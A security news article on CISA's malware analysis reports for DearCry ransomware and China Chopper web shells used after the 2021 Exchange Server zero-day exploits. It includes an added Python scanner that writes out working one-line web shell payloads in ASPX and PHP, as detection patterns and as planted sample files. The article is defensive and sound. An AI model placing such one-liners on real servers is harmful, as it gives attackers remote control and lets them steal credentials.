CISA publishes reports on DearCry ransomware and China Chopper Web Shell malware linked to Exchange Server exploits (update-2)

The Cybersecurity and Infrastructure Security Agency (CISA) has published malware analysis reports on the DearCry ransomware and on China Chopper Web Shell samples linked to the recent Exchange Server exploits. Attackers use this malware after the initial exploit to deepen their hold on on-premises Microsoft Exchange servers and to launch follow-on attacks.

These reports follow the urgent joint CISA and FBI cybersecurity advisory issued last month on exploitation of the Microsoft Exchange vulnerabilities. Malicious cyber actors used zero-day exploits (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to compromise thousands of Exchange servers around the globe.

In the updated alert, CISA added new information on DearCry ransomware and seven China Chopper Web Shell malware analysis reports (MARs). Two further China Chopper MARs were added on March 25, and one more China Chopper MAR plus a DearCry MAR on April 12.

DearCry ransomware

Microsoft's Security Intelligence team tweeted information on DearCry ransomware being deployed after on-premises Exchange servers had been compromised.

Microsoft further recommended that Exchange Server customers urgently prioritize installing the security updates, as noted in its guidance.

In addition, CISA maintains a Ransomware web page with guidance and resources organizations can use to raise awareness and take concrete steps against ransomware threats.

Furthermore, CISA added another malware analysis report on April 12 under AR21-102B (MAR-10330097-1.v1: DearCry Ransomware). The DearCry malware encrypts files on a device and demands ransom in exchange for decryption.

China Chopper Web Shells

CISA also provided malware details on a collection of ten China Chopper Web Shell samples; the set started at seven and has grown with each update.

The ten malware analysis reports are:

  1. AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell
  2. AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell
  3. AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell
  4. AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell
  5. AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell
  6. AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell
  7. AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell
  8. AR21-084A*: MAR-10329496-1.v1: China Chopper Webshell
  9. AR21-084B*: MAR-10329499-1.v1: China Chopper Webshell
  10. AR21-102A**: MAR-10331466-1.v1: China Chopper Webshell

Two new webshells* (AR21-084A and AR21-084B) were added on March 25, 2021.

An additional China Chopper webshell** (AR21-102A) was added on April 12, 2021.

A web shell is a script (here an ASP.NET page) that an attacker uploads to a compromised Exchange server so that it can be administered remotely over ordinary HTTP requests. Once in place, a web shell can be used to steal credentials, upload additional malware (for example, for watering hole attacks) or act as command-and-control infrastructure, to name a few uses.
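As an added example (not part of CISA's reports or of this article), the scanner below walks a web root and flags script files that carry the textbook China Chopper one-liner patterns: the ASP.NET form `eval(Request.Item["..."],"unsafe")` and the PHP form `@eval($_POST[...])`. The directory layout, file names and file contents it creates are constructed for the demo and are assumptions, not the specific samples CISA analyzed.

```python
"""Flag China Chopper-style one-line web shells under a web root.

Added example; the sample tree built by build_sample_tree() is constructed
for the demo and does not reproduce any sample from the CISA reports.
"""
import re
import tempfile
from pathlib import Path

# Only files the web server will execute server-side are worth scanning.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax", ".php", ".jsp"}

# Each indicator is strong on its own: a server-side eval of request input.
INDICATORS = {
    # <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
    # Also matches the shorter Request["pass"] form.
    "aspx_eval_request_unsafe": re.compile(
        r'eval\s*\(\s*Request(?:\.Item)?\s*\[[^\]]+\]\s*,\s*"unsafe"\s*\)',
        re.IGNORECASE),
    # <?php @eval($_POST['pass']); ?>
    "php_eval_post": re.compile(
        r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[', re.IGNORECASE),
}


def indicators_in(text: str) -> list:
    """Return the names of all indicators that match the given script text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: Path) -> dict:
    """Map each flagged script file (POSIX path relative to root) to its hits.

    Non-script files are skipped even if their content looks malicious,
    because the web server will not execute them.
    """
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue
        text = path.read_bytes().decode("utf-8", errors="ignore")
        hits = indicators_in(text)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def build_sample_tree(root: Path) -> None:
    """Write a constructed web root: two shells, one benign page, one text file."""
    samples = {
        # Classic ASPX China Chopper one-liner (constructed name and parameter).
        "aspnet_client/shell.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
        # Classic PHP China Chopper one-liner.
        "uploads/x.php": "<?php @eval($_POST['pass']); ?>",
        # Benign page: reads request input but never evaluates it as code.
        "owa/auth/logon.aspx":
            '<%@ Page Language="C#" %>'
            '<% string u = Request.Item["username"]; '
            'Response.Write(Server.HtmlEncode(u)); %>',
        # Same payload text in a non-script file: must not be flagged.
        "owa/auth/notes.txt":
            '<%eval(Request.Item["orange"],"unsafe");%>',
    }
    for rel, content in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def demo() -> dict:
    """Build the constructed tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        print(f"{rel_path}: {', '.join(hits)}")
```

On a real server the scan would be pointed at the IIS web root and the Exchange front-end directories rather than a temporary tree. A hit is a reason to start incident response, not the end of it, and a clean scan proves nothing: operators routinely obfuscate or rename the payload, so pair textual checks with the file-creation timestamps and IIS request logs that CISA's guidance also points to.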

CISA also provides Threat Awareness and Guidance on web shells to help organizations defend against similar threats.

Readers can also check out more information on the Microsoft security advisories related to the Exchange Server RCE vulnerabilities exploited in the wild.

Updates on March 29: This article was updated to include two new China Chopper Webshell MARs.

Updates on April 13: This article was updated to include one new China Chopper Webshell MAR and an additional DearCry MAR.
